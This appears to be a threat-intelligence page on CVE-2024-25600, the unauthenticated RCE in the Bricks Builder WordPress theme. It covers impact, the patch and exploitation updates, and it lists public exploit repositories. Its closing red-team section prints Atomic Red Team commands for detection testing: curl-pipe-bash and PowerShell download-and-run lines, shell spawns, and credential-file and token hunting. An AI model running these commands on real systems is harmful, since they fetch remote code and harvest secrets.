CVE-2024-25600
Overview
This vulnerability is a code injection flaw classified under CWE-94, resulting from improper control over code generation within the Bricks Builder WordPress theme. The root cause lies in inadequate sanitization and validation of user-supplied input submitted to the theme's rendering API, allowing untrusted data to be executed as code. The affected component is the Bricks Builder theme, specifically versions up to and including 1.9.6, which processes input through its rendering endpoints without sufficient security controls.
Vulnerability Description
Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection.This issue affects Bricks Builder: from n/a through 1.9.6.
Impact
An attacker can execute arbitrary code remotely without any authentication or user interaction, resulting in full compromise of the WordPress site and underlying server. This includes the ability to run system commands, manipulate site content, access sensitive data, and potentially pivot within the hosting environment. The exploit enables complete site takeover, leading to data breaches, service disruption, and loss of integrity and availability of the affected web property.
Solution
Users should upgrade the Bricks Builder theme to version 1.9.7 or later, where the vulnerability has been patched. Detailed patch instructions and advisories are available through the vendor’s official channels and the Patchstack article at https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme. No alternative workarounds are recommended; applying the vendor-supplied update is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Bricks Builder, which allows for improper control over the generation of code, is a critical security flaw that can lead to code injection attacks. This type of vulnerability arises when an application fails to properly validate or sanitize user inputs, allowing an attacker to inject malicious code into the system. In the case of Bricks Builder, this flaw can be exploited to execute arbitrary code on the server, potentially leading to unauthorized access to sensitive data, manipulation of application logic, or even complete system compromise. The affected versions, up to 1.9.6, are particularly vulnerable, as they lack the necessary safeguards to prevent such code injection.
Attack vectors for this vulnerability are varied and can be executed through multiple channels. An attacker could exploit this flaw by crafting a malicious payload that is submitted through forms or API endpoints within the Bricks Builder environment. For instance, if a user is able to input data that is subsequently processed by the application without adequate validation, the attacker can inject scripts or commands that the server will execute. Scenarios may include injecting PHP code that could allow the attacker to gain shell access to the server, or injecting JavaScript that could manipulate client-side behavior, leading to further exploitation such as cross-site scripting (XSS) or data exfiltration.
The real-world impact of this vulnerability is significant, particularly for businesses that rely on Bricks Builder for their web development needs. A successful exploitation could lead to severe business risks, including data breaches, loss of customer trust, and potential legal ramifications due to non-compliance with data protection regulations. Organizations could face financial losses from remediation efforts, downtime, and reputational damage. Furthermore, the high CVSS score of 10.0 indicates that the vulnerability poses an extreme risk, making it imperative for businesses to address it promptly to safeguard their operations and customer information.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and code reviews can help identify areas where user input is not adequately sanitized. Employing web application firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. Furthermore, developers should adopt secure coding practices, such as input validation and output encoding, to prevent code injection vulnerabilities from being introduced in the first place. Keeping the Bricks Builder and its dependencies up to date is essential, as newer versions may include patches that address this vulnerability.
In conclusion, the improper control of code generation in Bricks Builder represents a critical security risk that can lead to severe consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world implications of this vulnerability, businesses can take proactive steps to detect and mitigate the risks associated with code injection. Implementing robust security measures and fostering a culture of security awareness among developers will be key in preventing exploitation and protecting sensitive data in an increasingly complex threat landscape.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2024-25600, evidenced by the emergence of multiple new proof-of-concept exploit tools publicly available on GitHub. This development signifies a broadening of the exploit landscape, lowering the barrier for threat actors to weaponize the vulnerability in Bricks Builder. Our telemetry indicates that these tools automate unauthenticated remote code execution, increasing the likelihood of opportunistic attacks against unpatched WordPress environments. The publication of an official ExploitDB entry further legitimizes and facilitates adversary engagement with this critical vulnerability. Although the EPSS score remains high and stable, the rapid proliferation of exploitation resources elevates the operational risk, signaling a shift from theoretical to practical exploitation. Defenders should recognize that the threat actor community is actively leveraging this vulnerability, which underscores an urgent need for heightened vigilance in detection and response efforts.
Update 2 — July 17, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-25600, accompanied by the emergence of several sophisticated proof-of-concept tools that enhance attacker capabilities. These new tools incorporate advanced features such as interactive shells, multi-threaded scanning, and stealth modes, significantly lowering the technical barrier for threat actors to conduct unauthenticated remote code execution against vulnerable Bricks Builder installations. Our telemetry indicates that this surge is not only quantitative but qualitative, reflecting a maturation of the exploit landscape that enables more persistent and evasive attacks. Although the EPSS score shows a modest increase, the operational risk has grown disproportionately due to the expanded availability and functionality of exploitation frameworks. This evolution elevates the threat level from a primarily theoretical concern to an actively exploited vector, increasing the urgency for defenders to prioritize detection and response efforts against this vulnerability.
Update 3 — July 25, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2024-25600 vulnerability in Codeer Limited’s Bricks Builder. This increase is accompanied by the emergence of multiple new proof-of-concept exploit tools that enhance attacker capabilities, including interactive shells, stealth modes, and multi-threaded scanning functionalities. These developments indicate a rapid maturation of the exploit ecosystem, enabling adversaries to conduct more sophisticated and persistent attacks with greater operational flexibility. Although the EPSS score remains stable, the qualitative shift in exploit sophistication and availability significantly elevates the practical risk to affected environments. Defenders should recognize that this vulnerability is transitioning from a high-severity theoretical risk to an actively weaponized threat, increasing the likelihood of successful compromise and sustained control over vulnerable WordPress installations.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Unauthenticated RCE in Bricks Builder Theme
exploits/multi/http/wp_bricks_builder_rce
|
Calvin Alkan, Valentin Lobstein | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| WordPress Bricks Builder Theme - RCE | Jared Brits | webapps | multiple | - | View |
GitHub PoCs (24)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks <= 1.9.6
|
Chocapikk | 180 | 39 | 2024-02-20 | View |
|
K3ysTr0K3R/CVE-2024-25600-EXPLOIT
A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)
|
K3ysTr0K3R | 62 | 10 | 2024-03-01 | View |
|
Christbowel/CVE-2024-25600_Nuclei-Template
Nuclei template and information about the POC for CVE-2024-25600
|
Christbowel | 31 | 6 | 2024-02-21 | View |
|
so1icitx/CVE-2024-25600
Unauthenticated RCE exploit for CVE-2024-25600 in WordPress Bricks Builder <= 1.9.6. Executes arbitrary code remotely.
|
so1icitx | 13 | 3 | 2025-03-31 | View |
|
Tornad0007/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress
This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The ...
|
Tornad0007 | 8 | 0 | 2024-02-22 | View |
|
hy011121/CVE-2024-25600-wordpress-Exploit-RCE
(Mirorring)
|
hy011121 | 3 | 1 | 2024-02-29 | View |
|
CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600
CVE-2024-25600 - Unauthenticated RCE exploit for WordPress Bricks Builder Theme. Advanced exploitation framework with in...
|
CerberusMrXi | 1 | 0 | 2026-07-16 | View |
|
svchostmm/CVE-2024-25600-mass
|
svchostmm | 0 | 1 | 2024-05-17 | View |
|
X-Projetion/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE
WORDPRESS-CVE-2024-25600-EXPLOIT-RCE - WordPress Bricks Builder Remote Code Execution (RCE)
|
X-Projetion | 1 | 0 | 2024-04-20 | View |
|
estebanzarate/CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC
Unauthenticated remote code execution vulnerability in WordPress Bricks Builder <= 1.9.6. The template render endpoint a...
|
estebanzarate | 1 | 0 | 2026-02-18 | View |
|
h0w1tzxr/TryHack3M-Bricks-Heist
🧱 CVE-2024-25600 WordPress Bricks Builder RCE Exploit + TryHackMe Bricks Heist CTF Write-up
|
h0w1tzxr | 0 | 1 | 2026-01-04 | View |
|
diamorphine666/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks
|
diamorphine666 | 0 | 0 | 2024-08-20 | View |
|
w666-glitch/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks
|
w666-glitch | 0 | 0 | 2024-08-20 | View |
|
ivanbg2004/ODH-BricksBuilder-CVE-2024-25600-THM
OD&H's scanner for CVE-2024-25600 vulnerability in the Bricks Builder WordPress plugin. For use in Try Hack Me (THM) env...
|
ivanbg2004 | 0 | 0 | 2025-04-09 | View |
|
NanoWraith/CVE-2024-25600
|
NanoWraith | 0 | 0 | 2024-06-06 | View |
|
Anjai7/TryHack3M-Bricks-Heist
TryHackMe CTF writeup — WordPress RCE via CVE-2024-25600, crypto miner forensics, and LockBit ransomware group identific...
|
Anjai7 | 0 | 0 | 2025-08-09 | View |
|
ranjithxploit/CVE-2024-25600
Modified the CVE-2024-25600
|
ranjithxploit | 0 | 0 | 2025-11-28 | View |
|
DedsecTeam-BlackHat/Poleposph
Tools for scan CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)
|
DedsecTeam-BlackHat | 0 | 0 | 2025-05-09 | View |
|
r0otk3r/CVE-2024-25600
|
r0otk3r | 0 | 0 | 2025-07-10 | View |
|
meli0dasH4ck3r/cve-2024-25600
PoC for CVE-2024-25600
|
meli0dasH4ck3r | 0 | 0 | 2025-04-04 | View |
|
WanLiChangChengWanLiChang/CVE-2024-25600
|
WanLiChangChengWanLiChang | 0 | 0 | 2024-06-06 | View |
|
KaSooMi0228/CVE-2024-25600-Bricks-Builder-WordPress
|
KaSooMi0228 | 0 | 0 | 2024-07-30 | View |
|
Sibul-Dan-Glokta/test-task-CVE-2024-25600
Repository for internship test task.
|
Sibul-Dan-Glokta | 0 | 0 | 2025-01-26 | View |
|
wh6amiGit/CVE-2024-25600
Unauthenticated Remote Code Execution – Bricks
|
wh6amiGit | 0 | 0 | 2024-08-20 | View |
Threat Feed
14 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-25600 |
| patchstack.com |
GitHub CVE
vdb-entry
|
https://patchstack.com/database/vulnerability/bricks/wordpress-bricks-theme-1-9-6-unauthenticated-remote-code-execution-rce-vulnerability?_s_id=cve |
| snicco.io |
GitHub CVE
third-party-advisory
technical-description
|
https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6 |
| patchstack.com |
GitHub CVE
third-party-advisory
technical-description
|
https://patchstack.com/articles/critical-rce-patched-in-bricks-builder-theme?_s_id=cve |
| github.com |
GitHub CVE
exploit
|
https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT |
| github.com |
GitHub CVE
exploit
|
https://github.com/Chocapikk/CVE-2024-25600 |